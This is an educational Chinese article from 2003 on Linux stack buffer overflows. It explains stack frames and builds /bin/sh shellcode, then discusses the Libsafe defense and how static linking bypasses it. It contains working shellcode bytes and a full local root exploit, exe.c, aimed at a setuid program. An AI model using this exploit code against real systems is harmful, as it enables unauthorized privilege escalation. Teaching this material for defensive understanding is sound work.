王勇北京航空航天大学计算机学院系统软件实验室

2003 年 10 月 01 日

本文首先向读者讲解了Linux下进程地址空间的布局以及进程堆栈帧的结构，然后在此基础上介绍了Linux下缓冲区溢出攻击的原理及对策。

前言

从逻辑上讲进程的堆栈是由多个堆栈帧构成的，其中每个堆栈帧都对应一个函数调用。当函数调用发生时，新的堆栈帧被压入堆栈；当函数返回时，相应的堆栈帧从堆栈中弹出。尽管堆栈帧结构的引入为在高级语言中实现函数或过程这样的概念提供了直接的硬件支持，但是由于将函数返回地址这样的重要数据保存在程序员可见的堆栈中，因此也给系统安全带来了极大的隐患。

历史上最著名的缓冲区溢出攻击可能要算是1988年11月2日的Morris Worm所携带的攻击代码了。这个因特网蠕虫利用了fingerd程序的缓冲区溢出漏洞，给用户带来了很大危害。此后，越来越多的缓冲区溢出漏洞被发现。从bind、wu-ftpd、telnetd、apache等常用服务程序，到Microsoft、Oracle等软件厂商提供的应用程序，都存在着似乎永远也弥补不完的缓冲区溢出漏洞。

根据绿盟科技提供的漏洞报告，2002年共发现各种操作系统和应用程序的漏洞1830个，其中缓冲区溢出漏洞有432个，占总数的23.6%. 而绿盟科技评出的2002年严重程度、影响范围最大的十个安全漏洞中，和缓冲区溢出相关的就有6个。

在读者阅读本文之前有一点需要说明，文中所有示例程序的编译运行环境为gcc 2.7.2.3以及bash 1.14.7，如果读者不清楚自己所使用的编译运行环境可以通过以下命令查看：

 
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.7.2.3/specs
gcc version 2.7.2.3
$ rpm -qf /bin/sh
bash-1.14.7-16

如果读者使用的是较高版本的gcc或bash的话，运行文中示例程序的结果可能会与这里给出的结果不尽相符，具体原因将在相应章节中做出解释。

回页首

Linux下缓冲区溢出攻击实例

为了引起读者的兴趣，我们不妨先来看一个Linux下的缓冲区溢出攻击实例。

 
#include <stdlib.h>
#include <unistd.h>

extern char **environ;

int main(int argc, char **argv)
{
        char large_string[128];
        long *long_ptr = (long *) large_string;
        int i;
        char shellcode[] =
                "\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b"
                "\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd"
                "\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh";

        for (i = 0; i < 32; i++)
                *(long_ptr + i) = (int) strtoul(argv[2], NULL, 16);
        for (i = 0; i < (int) strlen(shellcode); i++)
                large_string[i] = shellcode[i];

        setenv("KIRIKA", large_string, 1);
        execle(argv[1], argv[1], NULL, environ);

        return 0;
}

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
        char buffer[96];

        printf("- %p -\\n", &buffer);
        strcpy(buffer, getenv("KIRIKA"));

        return 0;
}

图2 攻击对象toto.c

将上面两个程序分别编译为可执行程序，并且将toto改为属主为root的setuid程序：

$ gcc exe.c -o exe
$ gcc toto.c -o toto
$ su
Password:
# chown root.root toto
# chmod +s toto
# ls -l exe toto
-rwxr-xr-x   	 1 wy       os          	11871 Sep 28 20:20 exe*
-rwsr-sr-x		 1 root     root        	11269 Sep 28 20:20 toto*
# exit

OK，看看接下来会发生什么。首先别忘了用whoami命令验证一下我们现在的身份。其实Linux继承了UNIX的一个习惯，即普通用户的命令提示符是以$开始的，而超级用户的命令提示符是以#开始的。

$ whoami
wy
$ ./exe ./toto 0xbfffffff
- 0xbffffc38 -
Segmentation fault
$ ./exe ./toto 0xbffffc38
- 0xbffffc38 -
bash# whoami
root
bash#

第一次一般不会成功，但是我们可以准确得知系统的漏洞所在――0xbffffc38，第二次必然一击毙命。当我们在新创建的shell下再次执行whoami命令时，我们的身份已经是root了！由于在所有UNIX系统下黑客攻击的最高目标就是对root权限的追求，因此可以说系统已经被攻破了。

这里我们模拟了一次Linux下缓冲区溢出攻击的典型案例。toto的属主为root，并且具有setuid属性，通常这种程序是缓冲区溢出的典型攻击目标。普通用户wy通过其含有恶意攻击代码的程序exe向具有缺陷的toto发动了一次缓冲区溢出攻击，并由此获得了系统的root权限。有一点需要说明的是，如果读者使用的是较高版本的bash的话，即使通过缓冲区溢出攻击exe得到了一个新的shell，在看到whoami命令的结果后您可能会发现您的权限并没有改变，具体原因我们将在本文最后一节做出详细的解释。不过为了一睹为快，您可以先使用本文 代码包中所带的exe_pro.c作为攻击程序，而不是图1中的exe.c。

回页首

Linux下进程地址空间的布局及堆栈帧的结构

要想了解Linux下缓冲区溢出攻击的原理，我们必须首先掌握Linux下进程地址空间的布局以及堆栈帧的结构。

任何一个程序通常都包括代码段和数据段，这些代码和数据本身都是静态的。程序要想运行，首先要由操作系统负责为其创建进程，并在进程的虚拟地址空间中为其代码段和数据段建立映射。光有代码段和数据段是不够的，进程在运行过程中还要有其动态环境，其中最重要的就是堆栈。图3所示为Linux下进程的地址空间布局：

首先，execve(2)会负责为进程代码段和数据段建立映射，真正将代码段和数据段的内容读入内存是由系统的缺页异常处理程序按需完成的。另外，execve(2)还会将bss段清零，这就是为什么未赋初值的全局变量以及static变量其初值为零的原因。进程用户空间的最高位置是用来存放程序运行时的命令行参数及环境变量的，在这段地址空间的下方和bss段的上方还留有一个很大的空洞，而作为进程动态运行环境的堆栈和堆就栖身其中，其中堆栈向下伸展，堆向上伸展。

知道了堆栈在进程地址空间中的位置，我们再来看一看堆栈中都存放了什么。相信读者对C语言中的函数这样的概念都已经很熟悉了，实际上堆栈中存放的就是与每个函数对应的堆栈帧。当函数调用发生时，新的堆栈帧被压入堆栈；当函数返回时，相应的堆栈帧从堆栈中弹出。典型的堆栈帧结构如图4所示。

堆栈帧的顶部为函数的实参，下面是函数的返回地址以及前一个堆栈帧的指针，最下面是分配给函数的局部变量使用的空间。一个堆栈帧通常都有两个指针，其中一个称为堆栈帧指针，另一个称为栈顶指针。前者所指向的位置是固定的，而后者所指向的位置在函数的运行过程中可变。因此，在函数中访问实参和局部变量时都是以堆栈帧指针为基址，再加上一个偏移。对照图4可知，实参的偏移为正，局部变量的偏移为负。

介绍了堆栈帧的结构，我们再来看一下在Intel i386体系结构上堆栈帧是如何实现的。图5和图6分别是一个简单的C程序及其编译后生成的汇编程序。

int function(int a, int b, int c)
{
        char buffer[14];
        int     sum;
        sum = a + b + c;
        return sum;
}

void main()
{
        int     i;
        i = function(1,2,3);
}

1    .file   "example1.c"
2     .version    "01.01"
3 gcc2_compiled.:
4 .text
5     .align 4
6 .globl function
7     .type    function,@function
8 function:
9     pushl %ebp
10     movl %esp,%ebp
11     subl $20,%esp
12     movl 8(%ebp),%eax
13     addl 12(%ebp),%eax
14     movl 16(%ebp),%edx
15     addl %eax,%edx
16     movl %edx,-20(%ebp)
17     movl -20(%ebp),%eax
18     jmp .L1
19     .align 4
20 .L1:
21     leave
22     ret
23 .Lfe1:
24     .size    function,.Lfe1-function
25     .align 4
26 .globl main
27     .type    main,@function
28 main:
29     pushl %ebp
30	movl %esp,%ebp
31     subl $4,%esp
32     pushl $3
33     pushl $2
34     pushl $1
35     call function
36     addl $12,%esp
37     movl %eax,%eax
38     movl %eax,-4(%ebp)
39 .L2:
40     leave
41     ret
42 .Lfe2:
43     .size    main,.Lfe2-main
44     .ident  "GCC: (GNU) 2.7.2.3"

这里我们着重关心一下与函数function对应的堆栈帧形成和销毁的过程。从图5中可以看到，function是在main中被调用的，三个实参的值分别为1、2、3。由于C语言中函数传参遵循反向压栈顺序，所以在图6中32至34行三个实参从右向左依次被压入堆栈。接下来35行的call指令除了将控制转移到function之外，还要将call的下一条指令addl的地址，也就是function函数的返回地址压入堆栈。下面就进入function函数了，首先在第9行将main函数的堆栈帧指针ebp保存在堆栈中并在第10行将当前的栈顶指针esp保存在堆栈帧指针ebp中，最后在第11行为function函数的局部变量buffer[14]和sum在堆栈中分配空间。至此，函数function的堆栈帧就构建完成了，其结构如图7所示。

读者不妨回过头去与图4对比一下。这里有几点需要说明。首先，在Intel i386体系结构下，堆栈帧指针的角色是由ebp扮演的，而栈顶指针的角色是由esp扮演的。另外，函数function的局部变量buffer[14]由14个字符组成，其大小按说应为14字节，但是在堆栈帧中却为其分配了16个字节。这是时间效率和空间效率之间的一种折衷，因为Intel i386是32位的处理器，其每次内存访问都必须是4字节对齐的，而高30位地址相同的4个字节就构成了一个机器字。因此，如果为了填补buffer[14]留下的两个字节而将sum分配在两个不同的机器字中，那么每次访问sum就需要两次内存操作，这显然是无法接受的。还有一点需要说明的是，正如我们在本文前言中所指出的，如果读者使用的是较高版本的gcc的话，您所看到的函数function对应的堆栈帧可能和图7所示有所不同。上面已经讲过，为函数function的局部变量buffer[14]和sum在堆栈中分配空间是通过在图6中第11行对esp进行减法操作完成的，而sub指令中的20正是这里两个局部变量所需的存储空间大小。但是在较高版本的gcc中，sub指令中出现的数字可能不是20，而是一个更大的数字。应该说这与优化编译技术有关，在较高版本的gcc中为了有效运用目前流行的各种优化编译技术，通常需要在每个函数的堆栈帧中留出一定额外的空间。

下面我们再来看一下在函数function中是如何将a、b、c的和赋给sum的。前面已经提过，在函数中访问实参和局部变量时都是以堆栈帧指针为基址，再加上一个偏移，而Intel i386体系结构下的堆栈帧指针就是ebp，为了清楚起见，我们在图7中标出了堆栈帧中所有成分相对于堆栈帧指针ebp的偏移。这下图6中12至16的计算就一目了然了，8(%ebp)、12(%ebp)、16(%ebp)和-20(%ebp)分别是实参a、b、c和局部变量sum的地址，几个简单的add指令和mov指令执行后sum中便是a、b、c三者之和了。另外，在gcc编译生成的汇编程序中函数的返回结果是通过eax传递的，因此在图6中第17行将sum的值拷贝到eax中。

最后，我们再来看一下函数function执行完之后与其对应的堆栈帧是如何弹出堆栈的。图6中第21行的leave指令将堆栈帧指针ebp拷贝到esp中，于是在堆栈帧中为局部变量buffer[14]和sum分配的空间就被释放了；除此之外，leave指令还有一个功能，就是从堆栈中弹出一个机器字并将其存放到ebp中，这样ebp就被恢复为main函数的堆栈帧指针了。第22行的ret指令再次从堆栈中弹出一个机器字并将其存放到指令指针eip中，这样控制就返回到了第36行main函数中的addl指令处。addl指令将栈顶指针esp加上12，于是当初调用函数function之前压入堆栈的三个实参所占用的堆栈空间也被释放掉了。至此，函数function的堆栈帧就被完全销毁了。前面刚刚提到过，在gcc编译生成的汇编程序中通过eax传递函数的返回结果，因此图6中第38行将函数function的返回结果保存在了main函数的局部变量i中。

回页首

Linux下缓冲区溢出攻击的原理

明白了Linux下进程地址空间的布局以及堆栈帧的结构，我们再来看一个有趣的例子。

1 int function(int a, int b, int c) {
2     char buffer[14];
3     int sum;
4     int *ret;
5
6     ret = buffer + 20;
7     (*ret) += 10;
8     sum = a + b + c;
9     return sum;
10 }
11
12 void main() {
13     int x;
14
15     x = 0;
16     function(1,2,3);
17     x = 1;
18     printf("%d\\n",x);
19 }

在main函数中，局部变量x的初值首先被赋为0，然后调用与x毫无关系的function函数，最后将x的值改为1并打印出来。结果是多少呢，如果我告诉你是0你相信吗？闲话少说，还是赶快来看看函数function都动了哪些手脚吧。这里的function函数与图5中的function相比只是多了一个指针变量ret以及两条对ret进行操作的语句，就是它们使得main函数最后打印的结果变成了0。对照图7可知，地址buffer + 20处保存的正是函数function的返回地址，第7行的语句将函数function的返回地址加了10。这样会达到什么效果呢？看一下main函数对应的汇编程序就一目了然了。

$ gdb example2
(gdb) disassemble main
Dump of assembler code for function main:
0x804832c <main>:       push   %ebp
0x804832d <main+1>:     mov    %esp,%ebp
0x804832f <main+3>:     sub    $0x4,%esp
0x8048332 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x8048339 <main+13>:    push   $0x3
0x804833b <main+15>:    push   $0x2
0x804833d <main+17>:    push   $0x1
0x804833f <main+19>:    call   0x80482f8 <function>
0x8048344 <main+24>:    add    $0xc,%esp
0x8048347 <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x804834e <main+34>:    mov    0xfffffffc(%ebp),%eax
0x8048351 <main+37>:    push   %eax
0x8048352 <main+38>:    push   $0x80483b8
0x8048357 <main+43>:    call   0x8048284 <printf>
0x804835c <main+48>:    add    $0x8,%esp
0x804835f <main+51>:    leave
0x8048360 <main+52>:    ret
0x8048361 <main+53>:    lea    0x0(%esi),%esi
End of assembler dump.

地址为0x804833f的call指令会将0x8048344压入堆栈作为函数function的返回地址，而图8中第7行语句的作用就是将0x8048344加10从而变成了0x804834e。这么一改当函数function返回时地址为0x8048347的mov指令就被跳过了，而这条mov指令的作用正是用来将x的值改为1。既然x的值没有改变，我们打印看到的结果就必然是其初值0了。

当然，图8所示只是一个示例性的程序，通过修改保存在堆栈帧中的函数的返回地址，我们改变了程序正常的控制流。图8中程序的运行结果可能会使很多读者感到新奇，但是如果函数的返回地址被修改为指向一段精心安排好的恶意代码，那时你又会做何感想呢？缓冲区溢出攻击正是利用了在某些体系结构下函数的返回地址被保存在程序员可见的堆栈中这一缺陷，修改函数的返回地址，使得一段精心安排好的恶意代码在函数返回时得以执行，从而达到危害系统安全的目的。

说到缓冲区溢出就不能不提shellcode，shellcode读者已经在图1中见过了，其作用就是生成一个shell。下面我们就来一步步看一下这段令人眼花缭乱的程序是如何得来的。首先要说明一下，Linux下的系统调用都是通过int $0x80中断实现的。在调用int $0x80之前，eax中保存了系统调用号，而系统调用的参数则保存在其它寄存器中。图10所示是直接利用系统调用实现的Hello World程序。

#include <asm/unistd.h>

int errno;

_syscall3(int, write, int, fd, char *, data, int, len);

_syscall1(int, exit, int, status);

_start()
{
            write(0, "Hello world!\\n", 13);
            exit(0);
}

将其编译链接生成可执行程序hello：

$ gcc -c hello.c
$ ld hello.o -o hello
$ ./hello
Hello world!
$ ls -l hello
-rwxr-xr-x    1 wy       os           1188 Sep 29 17:31 hello*

有兴趣的读者可以将这个hello的大小和我们当初在第一节C语言课上学过的Hello World程序的大小比较一下，看看能不能用C语言写出更小的Hello World程序。图10中的_syscall3和_syscall1都是定义于/usr/include/asm/unistd.h中的宏，该文件中定义了以__NR_开头的各种系统调用的所对应的系统调用号以及_syscall0到_syscall6六个宏，分别用于参数个数为0到6的系统调用。由此可知，Linux系统中系统调用所允许的最大参数个数就是6个，比如mmap(2)。另外，仔细阅读syscall0到_syscall6六个宏的定义不难发现，系统调用号是存放在寄存器eax中的，而系统调用可能会用到的6个参数依次存放在寄存器ebx、ecx、edx、esi、edi和ebp中。

清楚了系统调用的使用规则，我先来看一下如何在Linux下生成一个shell。应该说这是非常简单的任务，使用execve(2)系统调用即可，如图11所示。

#include <unistd.h>

int main()
{
        char *name[2];

        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        _exit(0);
}

在shellcode.c中一共用到了两个系统调用，分别是execve(2)和_exit(2)。查看/usr/include/asm/unistd.h文件可以得知，与其相应的系统调用号__NR_execve和__NR_exit分别为11和1。按照前面刚刚讲过的系统调用规则，在Linux下生成一个shell并结束退出需要以下步骤：

• 在内存中存放一个以'\\0'结束的字符串"/bin/sh"；
• 将字符串"/bin/sh"的地址保存在内存中的某个机器字中，并且后面紧接一个值为0的机器字，这里相当于设置好了图11中name[2]中的两个指针；
• 将execve(2)的系统调用号11装入eax寄存器；
• 将字符串"/bin/sh"的地址装入ebx寄存器；
• 将第2步中设好的字符串"/bin/sh"的地址的地址装入ecx寄存器；
• 将第2步中设好的值为0的机器字的地址装入edx寄存器；
• 执行int $0x80，这里相当于调用execve(2)；
• 将_exit(2)的系统调用号1装入eax寄存器；
• 将退出码0装入ebx寄存器；
• 执行int $0x80，这里相当于调用_exit(2)。

于是我们就得到了图12所示的汇编程序。

 
1 void main()
2 {
3		__asm__("
4				jmp     1f
5		2:		popl    %esi
6				movl    %esi,0x8(%esi)
7				movb    $0x0,0x7(%esi)
8				movl    $0x0,0xc(%esi)
9				movl    $0xb,%eax
10				movl    %esi,%ebx
11				leal    0x8(%esi),%ecx
12				leal    0xc(%esi),%edx
13				int     $0x80
14				movl    $0x1, %eax
15				movl    $0x0, %ebx
16				int     $0x80
17		1:		call    2b
18				.string \\"/bin/sh\\"
19		");
20 }

这里第4行的jmp指令和第17行的call指令使用的都是IP相对寻址方式，第14行至第16行对应于_exit(2)系统调用，由于它比较简单，我们着重看一下调用execve(2)的过程。首先第4行的jmp指令执行之后控制就转移到了第17行的call指令处，在call指令的执行过程中除了将控制转移到第5行的pop指令外，还会将其下一条指令的地址压入堆栈。然而由图12可知，call指令后面并没有后续的指令，而是存放了字符串"/bin/sh"，于是实际被压入堆栈的便成了字符串"/bin/sh"的地址。第5行的pop指令将刚刚压入堆栈的字符串地址弹出到esi寄存器中。接下来的三条指令首先将esi中的字符串地址保存在字符串"/bin/sh"之后的机器字中，然后又在字符串"/bin/sh"的结尾补了个'\\0'，最后将0写入内存中合适的位置。第9行至第12行按图13所示正确设置好了寄存器eax、ebx、ecx和edx的值，在第13行就可以调用execve(2)了。但是在编译shellcodeasm.c之后，你会发现程序无法运行。原因就在于图13中所示的所有数据都存放在代码段中，而在Linux下存放代码的页面是不可写的，于是当我们试图使用图12中第6行的mov指令进行写操作时，页面异常处理程序会向运行我们程序的进程发送一个SIGSEGV信号，这样我们的终端上便会出现Segmentation fault的提示信息。

解决的办法很简单，既然不能对代码段进行写操作，我们就把图12中的代码挪到可写的数据段或堆栈段中。可是一段可执行的代码在数据段中应该怎么表示呢？其实，内存中存放着的无非是0和1这样的比特，当我们的程序将其用作代码时这些比特就成了代码，而当我们的程序将其用作数据时这些比特又成了数据。我们先来看一下图12中的代码在内存中是如何存放的，通过gdb中的x命令可以很容易的做到这一点，如图14所示。

$ gdb shellcodeasm
(gdb) disassemble main
Dump of assembler code for function main:
0x80482c4 <main>:       push   %ebp
0x80482c5 <main+1>:     mov    %esp,%ebp
0x80482c7 <main+3>:     jmp    0x80482f3 <main+47>
0x80482c9 <main+5>:     pop    %esi
0x80482ca <main+6>:     mov    %esi,0x8(%esi)
0x80482cd <main+9>:     movb   $0x0,0x7(%esi)
0x80482d1 <main+13>:    movl   $0x0,0xc(%esi)
0x80482d8 <main+20>:    mov    $0xb,%eax
0x80482dd <main+25>:    mov    %esi,%ebx
0x80482df <main+27>:    lea    0x8(%esi),%ecx
0x80482e2 <main+30>:    lea    0xc(%esi),%edx
0x80482e5 <main+33>:    int    $0x80
0x80482e7 <main+35>:    mov    $0x1,%eax
0x80482ec <main+40>:    mov    $0x0,%ebx
0x80482f1 <main+45>:    int    $0x80
0x80482f3 <main+47>:    call   0x80482c9 <main+5>
0x80482f8 <main+52>:    das
0x80482f9 <main+53>:    bound  %ebp,0x6e(%ecx)
0x80482fc <main+56>:    das
0x80482fd <main+57>:    jae    0x8048367
0x80482ff <main+59>:    add    %cl,%cl
0x8048301 <main+61>:    ret
0x8048302 <main+62>:    mov    %esi,%esi
End of assembler dump.
(gdb) x /49xb 0x80482c7
0x80482c7 <main+3>:		0xeb 0x2a 0x5e 0x89 0x76 0x08 0xc6 0x46
0x80482cf <main+11>:		0x07 0x00 0xc7 0x46 0x0c 0x00 0x00 0x00
0x80482d7 <main+19>:		0x00 0xb8 0x0b 0x00 0x00 0x00 0x89 0xf3
0x80482df <main+27>:		0x8d 0x4e 0x08 0x8d 0x56 0x0c 0xcd 0x80
0x80482e7 <main+35>:		0xb8 0x01 0x00 0x00 0x00 0xbb 0x00 0x00
0x80482ef <main+43>:		0x00 0x00 0xcd 0x80 0xe8 0xd1 0xff 0xff
0x80482f7 <main+51>:		0xff

从jmp指令的起始地址0x80482c7到call指令的结束地址0x80482f8，一共49个字节。起始地址为0x80482f8的8个字节的内存单元中实际存放的是字符串"/bin/sh"，因此我们在那里看到了几条奇怪的指令。至此，我们的shellcode已经初具雏形了，但是还有几处需要改进。首先，将来我们要通过strcpy(3)这种存在安全隐患的函数将上面的代码拷贝到某个内存缓冲区中，而strcpy(3)在遇到内容为'\\0'的字节时就会停止拷贝。然而从图14中可以看到，我们的代码中有很多这样的'\\0'字节，因此需要将它们全部去掉。另外，某些指令的长度可以缩减，以使得我们的shellcode更加精简。按照图15所列的改进方案，我们便得到了图16中最终的shellcode。

存在问题的指令          改进后的指令
movb $0x0,0x7(%esi)     xorl %eax,%eax
molv $0x0,0xc(%esi)     movb %eax,0x7(%esi)
                        movl %eax,0xc(%esi)

movl $0xb,%eax          movb $0xb,%al

movl $0x1, %eax         xorl %ebx,%ebx
movl $0x0, %ebx         movl %ebx,%eax
                        inc %eax

void main()
{
	__asm__("
			jmp     1f
	2:		popl    %esi
			movl    %esi,0x8(%esi)
			xorl    %eax,%eax
			movb    %eax,0x7(%esi)
			movl    %eax,0xc(%esi)
			movb    $0xb,%al
			movl    %esi,%ebx
			leal    0x8(%esi),%ecx
			leal    0xc(%esi),%edx
			int     $0x80
			xorl    %ebx,%ebx
			movl    %ebx,%eax
			inc     %eax
			int     $0x80
	1:		call    2b
			.string \\"/bin/sh\\"
	");
}

同样，按照上面的方法再次查看内存中的shellcode代码，如图16所示。我们在图16中再次列出了图1 用到过的shellcode，有兴趣的读者不妨比较一下。

$ gdb shellcodeasm2
(gdb) disassemble main
Dump of assembler code for function main:
0x80482c4 <main>:       push   %ebp
0x80482c5 <main+1>:     mov    %esp,%ebp
0x80482c7 <main+3>:     jmp    0x80482e8 <main+36>
0x80482c9 <main+5>:     pop    %esi
0x80482ca <main+6>:     mov    %esi,0x8(%esi)
0x80482cd <main+9>:     xor    %eax,%eax
0x80482cf <main+11>:    mov    %al,0x7(%esi)
0x80482d2 <main+14>:    mov    %eax,0xc(%esi)
0x80482d5 <main+17>:    mov    $0xb,%al
0x80482d7 <main+19>:    mov    %esi,%ebx
0x80482d9 <main+21>:    lea    0x8(%esi),%ecx
0x80482dc <main+24>:    lea    0xc(%esi),%edx
0x80482df <main+27>:    int    $0x80
0x80482e1 <main+29>:    xor    %ebx,%ebx
0x80482e3 <main+31>:    mov    %ebx,%eax
0x80482e5 <main+33>:    inc    %eax
0x80482e6 <main+34>:    int    $0x80
0x80482e8 <main+36>:    call   0x80482c9 <main+5>
0x80482ed <main+41>:    das
0x80482ee <main+42>:    bound  %ebp,0x6e(%ecx)
0x80482f1 <main+45>:    das
0x80482f2 <main+46>:    jae    0x804835c
0x80482f4 <main+48>:    add    %cl,%cl
0x80482f6 <main+50>:    ret
0x80482f7 <main+51>:    nop
End of assembler dump.
(gdb) x /38xb 0x80482c7
0x80482c7 <main+3>:		0xeb 0x1f 0x5e 0x89 0x76 0x08 0x31 0xc0
0x80482cf <main+11>:		0x88 0x46 0x07 0x89 0x46 0x0c 0xb0 0x0b
0x80482d7 <main+19>:		0x89 0xf3 0x8d 0x4e 0x08 0x8d 0x56 0x0c
0x80482df <main+27>:		0xcd 0x80 0x31 0xdb 0x89 0xd8 0x40 0xcd
0x80482e7 <main+35>:		0x80 0xe8 0xdc 0xff 0xff 0xff

char shellcode[] =
"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b"
"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd"
"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh";

我猜当你看到这里时一定也像我当初一样已经热血沸腾、迫不及待了吧？那就赶快来试一下吧。

char shellcode[] =
        "\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b"
        "\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd"
        "\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh";

void main()
{
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

将testsc.c编译成可执行程序，再运行testsc就可以看到shell了！

$ gcc testsc.c -o testsc
$ ./testsc
bash$

图19描绘了testsc.c程序所作的一切，相信有了前面那么长的铺垫，读者在看到图19时应该已经没有困难了。

下面我们该回头看看本文开头的那个Linux下缓冲区溢出攻击实例了。攻击程序exe.c利用了系统中存在漏洞的程序toto.c，通过以下步骤向系统发动了一次缓冲区溢出攻击：

• 通过命令行参数argv[2]得到toto.c程序中缓冲区buffer[96]的地址，并将该地址填充到large_string[128]中；
• 将我们已经准备好的shellcode拷贝到large_string[128]的开头；
• 通过环境变量KIRIKA将我们的shellcode注射到buffer[96]中；
• 当toto.c程序中的main函数返回时，buffer[96]中的shellcode得以运行；由于toto的属主为root，并且具有setuid属性，因此我们得到的shell便具有了root权限。

程序exe.c的控制流程与图19所示程序testsc.c的控制流程非常相似，唯一的不同在于这次我们的shellcode是寄宿在toto运行时的堆栈里，而不是在数据段中。之所以不能再将shellcode放在数据段中是因为当我们在程序exe.c中调用execle(3) 运行toto时，进程整个地址空间的映射会根据toto程序头部的描述信息重新设置，而原来的地址空间中数据段的内容已经不能再访问了，因此在程序exe.c中shellcode是通过环境变量来传递的。

怎么样，是不是感觉传说中的黑客不再像你想象的那样神秘了？暂时不要妄下结论，在上面的缓冲区溢出攻击实例中，攻击程序exe之所以能够准确的将shellcode注射到toto的buffer[96]中，关键在于我们在toto程序中打印出了buffer[96]在堆栈中的起始地址。当然，在实际的系统中，不要指望有像toto这样家有丑事还自揭疮疤的事情发生。

回页首

Linux下防御缓冲区溢出攻击的对策

了解了缓冲区溢出攻击的原理，接下来要做的显然就是要找出克敌之道。这里，我们主要介绍一种非常简单但是又比较流行的方法――Libsafe。

在标准C库中存在着很多像strcpy(3)这种用于处理字符串的函数，它们将一个字符串拷贝到另一个字符串中。对于何时停止拷贝，这些函数通常只有一个判断标准，即是否遇上了'\\0'字符。然而这个唯一的标准显然是不够的。我们在上一节刚刚分析过的Linux下缓冲区溢出攻击实例正是利用strcpy(3)对系统实施了攻击，而strcpy(3)的缺陷就在于在拷贝字符串时没有将目的字符串的大小这一因素考虑进来。像这样的函数还有很多，比如strcat、gets、scanf、sprintf等等。统计数据表明，在已经发现的缓冲区溢出攻击案例中，肇事者多是这些函数。正是基于上述事实，Avaya实验室推出了Libsafe。

在现在的Linux系统中，程序链接时所使用的大多都是动态链接库。动态链接库本身就具有很多优点，比如在库升级之后，系统中原有的程序既不需要重新编译也不需要重新链接就可以使用升级后的动态链接库继续运行。除此之外，Linux还为动态链接库的使用提供了很多灵活的手段，而预载(preload)机制就是其中之一。在Linux下，预载机制是通过环境变量LD_PRELOAD的设置提供的。简单来说，如果系统中有多个不同的动态链接库都实现了同一个函数，那么在链接时优先使用环境变量LD_PRELOAD中设置的动态链接库。这样一来，我们就可以利用Linux提供的预载机制将上面提到的那些存在安全隐患的函数替换掉，而Libsafe正是基于这一思想实现的。

图20所示的testlibsafe.c是一段非常简单的程序，字符串buf2[16]中首先被写满了'A'，然后再通过strcpy(3)将其拷贝到buf1[8]中。由于buf2[16]比buf1[8]要大，显然会发生缓冲区溢出，而且很容易想到，由于'A'的二进制表示为0x41，所以main函数的返回地址被改为了0x41414141。这样当main返回时就会发生Segmentation fault。

#include <string.h>

void main()
{
        char    buf1[8];
        char    buf2[16];
        int     i;

        for (i = 0; i < 16; ++i)
                buf2[i] = 'A';
        strcpy(buf1, buf2);
}

$ gcc testlibsafe.c -o testlibsafe
$ ./testlibsafe
Segmentation fault (core dumped)

下面我们就来看一看Libsafe是如何保护我们免遭缓冲区溢出攻击的。首先，在系统中安装Libsafe，本文的附件中提供了其2.0版的安装包。

$ su
Password:
# rpm -ivh libsafe-2.0-2.i386.rpm
libsafe		##################################################
# exit

至此安装还没有结束，接下来还要正确设置环境变量LD_PRELOAD。

$ export LD_PRELOAD=/lib/libsafe.so.2

下面就可以来试试看了。

$ ./testlibsafe
Detected an attempt to write across stack boundary.
Terminating /home2/wy/projects/overflow/bof/testlibsafe.
    uid=1011  euid=1011  pid=9481
Call stack:
    0x40017721
    0x4001780a
    0x8048328
    0x400429c6
Overflow caused by strcpy()

可以看到，Libsafe正确检测到了由strcpy()函数导致的缓冲区溢出，其uid、euid和pid，以及进程运行时的Call stack也被一并列出。另外，这些信息不光是在终端上显示，还会被记录到系统日志中，这样系统管理员就可以掌握潜在的攻击来源并及时加以防范。

那么，有了Libsafe我们就可以高枕无忧了吗？千万不要有这种天真的想法，在计算机安全领域入侵与反入侵的较量永远都不会停止。其实Libsafe为我们提供的保护可以被轻易的破坏掉。由于Libsafe的实现依赖于Linux系统为动态链接库所提供的预载机制，因此对于使用静态链接库的具有缓冲区溢出漏洞的程序Libsafe也就无能为力了。

$ gcc -static testlibsafe.c -o testlibsafe_static
$ env | grep LD
LD_PRELOAD=/lib/libsafe.so.2
$ ./testlibsafe_static
Segmentation fault (core dumped)

如果在使用gcc编译时加上-static选项，那么链接时使用的便是静态链接库。在系统已经安装了Libsafe的情况下，可以看到testlibsafe_static再次产生了Segmentation fault。

